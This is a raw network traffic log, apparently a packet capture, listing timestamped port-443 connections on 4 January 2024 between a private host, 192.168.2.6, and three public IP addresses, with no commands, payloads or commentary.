                                                                                    Jan 4, 2024 08:30:04.552598953 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.552608013 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.552639961 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.554915905 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.554930925 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.555001020 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.555008888 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.557588100 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.557606936 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.557672024 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.557678938 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.559745073 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.559758902 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.559834003 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.559835911 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.559873104 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.562691927 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.912488937 CET49720443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.912535906 CET44349720104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.912623882 CET49720443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.913048029 CET49720443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.913062096 CET44349720104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:05.112169027 CET44349720104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:05.113851070 CET49720443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:05.113877058 CET44349720104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:05.589143038 CET44349720104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:05.589313984 CET44349720104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:05.589390039 CET49720443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:05.590785027 CET49720443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:06.046015024 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.046036959 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.046107054 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.046906948 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.046920061 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.346312046 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.346523046 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.348514080 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.348531961 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.348807096 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.350261927 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.396733046 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.446788073 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.446944952 CET4434972115.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.446999073 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.447691917 CET49721443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:06.727193117 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:06.727227926 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.727309942 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:06.727732897 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:06.727746964 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.945233107 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:06.947098970 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:06.947134972 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.193810940 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194170952 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194205999 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194366932 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194391966 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194535971 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194545984 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194650888 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194659948 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194727898 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194761992 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194804907 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194818020 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194899082 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.194907904 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.194984913 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195014000 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.195059061 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195071936 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.195190907 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195252895 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195297956 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.195327997 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195338964 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.195426941 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195437908 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.195482016 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195486069 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:07.195591927 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:07.195600033 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:08.299674988 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:08.299841881 CET44349722104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:08.299928904 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:08.300715923 CET49722443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:08.302642107 CET49723443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:08.302663088 CET44349723104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:08.302745104 CET49723443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:08.303199053 CET49723443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:08.303210020 CET44349723104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:08.505490065 CET44349723104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:08.508357048 CET49723443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:08.508366108 CET44349723104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:09.180824041 CET44349723104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:09.180943012 CET44349723104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:09.181008101 CET49723443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:09.181690931 CET49723443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:13.395180941 CET49726443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:13.395211935 CET4434972615.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:13.395313025 CET49726443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:13.395947933 CET49726443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:13.395958900 CET4434972615.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:13.590221882 CET4434972615.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:13.592066050 CET49726443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:13.592082024 CET4434972615.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:13.820146084 CET4434972615.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:13.820228100 CET4434972615.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:13.820389032 CET49726443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:13.820825100 CET49726443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:14.146617889 CET49729443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.146686077 CET44349729104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.146764040 CET49729443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.147208929 CET49729443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.147229910 CET44349729104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.149584055 CET49730443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.149626017 CET44349730104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.149691105 CET49730443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.150127888 CET49730443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.150137901 CET44349730104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.351366997 CET44349729104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.353336096 CET44349730104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.353898048 CET49729443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.353926897 CET44349729104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:14.354809999 CET49730443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:14.354839087 CET44349730104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.024823904 CET44349729104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.024951935 CET44349729104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.025187969 CET49729443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.025660992 CET49729443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.026932001 CET49733443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.026968002 CET44349733104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.027034998 CET49733443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.027548075 CET49733443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.027564049 CET44349733104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.035537958 CET44349730104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.035653114 CET44349730104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.036891937 CET49730443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.037264109 CET49730443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.038387060 CET49734443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.038428068 CET44349734104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.038486004 CET49734443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.038969040 CET49734443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.038985968 CET44349734104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.229079008 CET44349733104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.237692118 CET44349734104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.243673086 CET49734443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.243691921 CET44349734104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.243789911 CET49733443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.243827105 CET44349733104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.705882072 CET44349733104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.705996037 CET44349733104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.706065893 CET49733443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.706581116 CET49733443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.708170891 CET49735443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.708210945 CET44349735104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.708275080 CET49735443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.708648920 CET49735443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.708663940 CET44349735104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.907355070 CET44349734104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.907453060 CET44349734104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.907545090 CET49734443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.908035040 CET49734443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.910092115 CET44349735104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.911786079 CET49735443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.911817074 CET44349735104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.919759035 CET49735443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:15.919787884 CET44349735104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.919846058 CET49735443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.013225079 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.013263941 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.013348103 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.014188051 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.014198065 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.221633911 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.221704006 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.226711035 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.226718903 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.226980925 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.228744030 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.276742935 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.506009102 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.506124973 CET44349736162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.506234884 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.516360044 CET49736443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:16.630170107 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.630202055 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.630271912 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.630815029 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.630829096 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.836484909 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.836556911 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.839817047 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.839823008 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.840070963 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:16.841780901 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:16.884742975 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:17.324944973 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:17.325073004 CET44349737104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:17.325323105 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:17.326086044 CET49737443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:17.328185081 CET49738443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:17.328239918 CET44349738104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:17.328341961 CET49738443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:17.328834057 CET49738443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:17.328849077 CET44349738104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:17.528661966 CET44349738104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:17.530623913 CET49738443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:17.530649900 CET44349738104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.012290001 CET44349738104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.012408018 CET44349738104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.012574911 CET49738443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:18.012914896 CET49738443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:18.027148962 CET49739443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:18.027185917 CET44349739162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.027312040 CET49739443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:18.027925968 CET49739443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:18.027940989 CET44349739162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.222459078 CET44349739162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.224931002 CET49739443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:18.224962950 CET44349739162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.516505003 CET44349739162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.516597033 CET44349739162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.516807079 CET49739443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:18.517333984 CET49739443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:18.625103951 CET49740443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:18.625140905 CET44349740104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.625241995 CET49740443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:18.625742912 CET49740443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:18.625761032 CET44349740104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.823082924 CET44349740104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:18.825182915 CET49740443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:18.825203896 CET44349740104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:19.525943995 CET44349740104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:19.526076078 CET44349740104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:19.526268005 CET49740443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:19.526940107 CET49740443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:19.529582977 CET49741443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:19.529630899 CET44349741104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:19.529715061 CET49741443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:19.530145884 CET49741443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:19.530158997 CET44349741104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:19.728600979 CET44349741104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:19.730268955 CET49741443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:19.730304003 CET44349741104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.405807972 CET44349741104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.405919075 CET44349741104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.406035900 CET49741443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:20.406836987 CET49741443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:20.411540031 CET49742443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:20.411585093 CET44349742162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.411653996 CET49742443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:20.412041903 CET49742443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:20.412055969 CET44349742162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.606910944 CET44349742162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.609231949 CET49742443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:20.609251022 CET44349742162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.894267082 CET44349742162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.894364119 CET44349742162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.894463062 CET49742443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:20.895474911 CET49742443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:20.999325991 CET49743443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:20.999366999 CET44349743104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:20.999468088 CET49743443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.000032902 CET49743443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.000045061 CET44349743104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:21.199476957 CET44349743104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:21.202434063 CET49743443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.202451944 CET44349743104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:21.896128893 CET44349743104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:21.896258116 CET44349743104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:21.896308899 CET49743443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.917767048 CET49743443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.919569016 CET49744443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.919609070 CET44349744104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:21.919727087 CET49744443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.921411991 CET49744443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:21.921426058 CET44349744104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.119389057 CET44349744104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.121129036 CET49744443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:22.121154070 CET44349744104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.612561941 CET44349744104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.612683058 CET44349744104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.612812996 CET49744443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:22.613209963 CET49744443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:22.617486000 CET49745443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:22.617526054 CET44349745162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.617599010 CET49745443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:22.617917061 CET49745443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:22.617930889 CET44349745162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.812458992 CET44349745162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:22.814150095 CET49745443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:22.814166069 CET44349745162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.064280987 CET44349745162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.064380884 CET44349745162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.064593077 CET49745443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:23.065023899 CET49745443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:23.171905994 CET49746443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.171937943 CET44349746104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.171992064 CET49746443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.172621012 CET49746443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.172633886 CET44349746104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.373370886 CET44349746104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.375248909 CET49746443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.375272989 CET44349746104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.867480993 CET44349746104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.867630959 CET44349746104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.869627953 CET49746443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.870620966 CET49746443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.871876001 CET49748443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.871906042 CET44349748104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:23.871992111 CET49748443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.872514009 CET49748443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:23.872528076 CET44349748104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.072741985 CET44349748104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.074415922 CET49748443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:24.074430943 CET44349748104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.555607080 CET44349748104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.555742025 CET44349748104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.555783987 CET49748443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:24.556442976 CET49748443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:24.562475920 CET49749443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:24.562520027 CET44349749162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.562611103 CET49749443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:24.563220978 CET49749443192.168.2.6162.159.129.233
